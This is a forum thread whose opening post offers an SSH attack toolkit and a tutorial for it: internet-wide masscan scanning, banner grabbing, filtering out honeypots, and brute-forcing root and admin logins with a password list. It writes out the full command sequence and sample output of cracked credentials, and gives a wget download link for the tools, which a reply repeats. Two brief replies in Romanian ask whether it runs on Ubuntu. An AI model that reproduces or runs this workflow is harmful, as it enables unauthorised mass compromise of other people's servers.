Eric Posted September 16, 2016 Report Share Posted September 16, 2016 INFO: Quote 1. ssh2banner is for retriving the banner of the ssh server. The good thing is that you don't even need u/p, thus making this a very good tool of determining if is a proper ssh server INPUT FILE = `i` 1.2.3.4 3.3.3.3 4.4.4.4 OUTPUT 1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu 3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2 4.4.4.4:22:SSH-WHATEVER_BANNER EXAMPLE RUN ./ssh2banner <FORKS> <PORT> <TIMEOUT> <VIPCODE> 2. bssh2z (brute ssh) is for brute-forcing list of ips with various passwords INPUT FILE (list of ips) = `i` 1.2.3.4 3.3.3.3 4.4.4.4 INPUT FILE (list of user/pass combo) = `p` root $BLANKPASS admin admin user pass OUTPUT `n` -> nobash,busybox,honeypot,other linux root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5 `v` -> vuln,virtual,good linux root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln EXAMPLE RUN ./bssh2z <FORKS> <PORT> <TIMEOUT> <VIPCODE> If you put like 20 ips and 400 passwords and the scan works slow, don't worry, it is a fail2ban protection. It is pointless to finish them in 1 minute, thus you will get banned after the first 5 tries in less then a minute. It will finish it, have patience. 3. ssh2check (checker ssh) is for re-check your already N or V file from bssh2z to know what servers are still online INPUT FILE (list of ips) = `list.txt` root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln OUTPUT `others.txt` -> nobash,busybox,honeypot,other linux root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5 `servers.txt` -> vuln,virtual,good linux root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln EXAMPLE RUN ./ssh2check <FORKS> <PORT> <TIMEOUT> <VIPCODE> Tutorial: Quote This is a tutorial that will learn you to efficiently scan SSH servers real fast. #HoneyPot banners -> SSH-2.0-Twisted and more #Honeypot Ram or CPU -> Ram: "7880 7690 189 0 400 5171" ; CPU: "Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz", some "QEMU Virtual CPU version 1.7.0" but not all #Good servers banners -> "SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1.2", "SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u6", "SSH-2.0-OpenSSH_6.6.1" and more, all OpenSSH its posible good #Nobash banners -> "SSH-2.0-dropbear", "SSH-2.0-IPSSH-1.10.0", "SSH-2.0-XXXX", "SSH-2.0-Parks", "SSH-2.0-ROSSSH", "SSH-1.99-Cisco-1.25" and more #Shitty banners -> "SSH-2.0-RomSShell_4.62", "SSH-1.99-cryptlib", "", and more #Info: Only for uid0 ######################################## password=unlimited port=22 timeout=15 threads=500 ssSpeed=10 masscan_speed=20000 ######################################### rm -rf input.txt bios.txt i ./masscan $1 -p22 -oL input.txt --max-rate $masscan_speed --open --banners --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 -sS -Pn -n --randomize-hosts -v --send-eth ./ss $port -a $1 -s $ssSpeed So we have the bios.txt that containts a list of ips that have port 22 opened it is time to put it to the check with ssh2banner. (banner ssh will read `i` file, also shuffeling ips) cat bios.txt | sort -u | shuf > i ./ssh2banner 150 22 10 YOUR_VIPCODE_PASSWORD; We will use 150 forks (max ssh connection at a time), but you can put whatever number you want(500,1000), be carefull to not get your server banned or in ram/cpu load. The ssh2banner is way faster then the bssh2z (brute-ssh) because it is just connecting to the server and getting the ssh-banner only without username/passowrd. It will generate an `banners.log` file that will contain data like this : 1.2.3.4:22:SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu 3.3.3.3:22:SSH-2.0-OpenSSH_3.7.1p2 4.4.4.4:22:SSH-WHATEVER_BANNER You will see a lot of banners, starting from OpenSSH to dropbear or some that you even heared about, like routers and other stuff. This list is perfect to do a brute-SSH attack on it, thus you are 100% that those are servers and not some other applications that are opened on port 22. Retrieve just the ips from this list with this command : rm i; cat banners.log | cut -f ":" -f 1 > i; if you wish you can scan only dropbear cat banners.log | grep "dropbear" | cut -f ":" -f 1 > i; or cisco routers cat banners.log | grep "cisco" | cut -f ":" -f 1 > i; Create a nice password file `p` begining with the user/pass combo "root $BLANKPASS", should look like this : root $BLANKPASS admin admin username password ... then do a wc -l i p 233214 i 18 p 233232 total Looks ok Now we will do a brute-SSH attack on those using this command ./bssh2z 150 22 10 YOUR_VIPCODE_PASSWORD; You will see something like this going on: Current version : 2.5.1 Last version : 2.4.1 Counting PASS Counted [18] PASS Counting IPS Counted [233214] IPS There are [4197852] possible combinations Starting session 0 Trying user/pass combo #1->[guest][] Combo [9 of 4197852] -> [178.27.29.115] with [guest][] Combo [4 of 4197852] -> [220.128.68.129] with [guest][] ... Duplicate NOBASH [128.54.202.72] Duplicate NOBASH [37.48.86.100] Combo [53262 of 4197852] -> [67.221.173.53] with [guest][] .... You will see the checking process begin and from time to time check your `n`(non-bash servers) and `v`(good/vuln servers) files, should look like this : N root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 V root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln And there you go. More than that, from time to time you can recheck them to see what servers are still online with ssh2check (checker-ssh) cat n v > list.txt; ./ssh2check 150 22 10 YOUR_VIPCODE_PASSWORD; it will output 2 files `others.txt` -> nobash,busybox,honeypot,other linux root:r0ot:1.2.3.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:4.4.4.4:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:5.5.5.5:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.51 root:r0ot:6.6.6.6:22:UNKNOWN_SYSTEM:SSH-2.0-dropbear_0.5 `servers.txt` -> vuln,virtual,good linux root::7.7.7.7:22:Linux:SSH-2.0-OpenSSH_6.6:Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz:3764 2558 1206 0 166 336:vuln user:live:8.8.8.8:22:Linux:SSH-2.0-OpenSSH_6.0p1 Debian-4:Intel(R) Core(TM) i5 CPU 760 @ 2.80GHz:6040 1307 4732 0 135 633:vuln root::9.9.9.9:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 179 0 0 14317:vuln root::10.10.10.10:22:Linux:SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u2:ARMv7 Processor rev 2 (v7l):492 281 210 12 47 109:vuln root::11.11.11.11:22:Linux:SSH-2.0-OpenSSH_7.1:Intel(R) Atom(TM) CPU C2758 @ 2.41GHz:16038 15859 178 0 0 14317:vuln Happy scanning. Download link: wget http://i9x0.com/bssh2z-full.tar; tar xvf bssh2z-full.tar; cd bssh2z-full; cat info.txt ; cat tutorial.txt 5 Link to comment Share on other sites More sharing options...
ndrivprototyp3 Posted November 4, 2016 Report Share Posted November 4, 2016 Functioneaza si pe ubuntu? Link to comment Share on other sites More sharing options...
Technetium Posted November 5, 2016 Report Share Posted November 5, 2016 23 hours ago, ndrivprototyp3 said: Functioneaza si pe ubuntu? wget http://i9x0.com/bssh2z-full.tar; tar xvf bssh2z-full.tar; cd bssh2z-full; cat info.txt ; cat tutorial.txt Ce-ti spun comenzile de mai sus? Oare functioneaza? Ce-ar fi sa incerci? Link to comment Share on other sites More sharing options...